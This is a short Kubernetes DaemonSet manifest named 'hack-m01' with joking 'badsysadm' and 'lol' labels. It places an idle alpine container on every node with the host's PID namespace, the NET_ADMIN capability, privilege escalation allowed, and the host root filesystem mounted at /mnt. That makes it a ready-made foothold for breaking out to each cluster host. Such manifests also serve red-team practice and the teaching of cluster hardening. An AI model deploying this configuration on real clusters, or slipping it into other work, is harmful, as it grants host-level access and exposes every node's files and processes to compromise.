apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hack-m01
  labels:
    badsysadm: "yes"
    lol: "yes"
spec:
  selector:
    matchLabels:
      lol: "yes"
      badsysadm: "yes"
  template:
    metadata:
      labels:
        lol: "yes"
        badsysadm: "yes"
    spec:
      hostPID: true
      containers:
      - image: alpine:3.8
        command: ["sh", "-c", "sleep 999999"]
        name: "lol"
        tty: true
        volumeMounts:
        - name: root
          mountPath: /mnt
        securityContext:
          allowPrivilegeEscalation: true
          capabilities:
            add: ["NET_ADMIN"]
      volumes:
      - name: root
        hostPath:
          path: /
          type: Directory
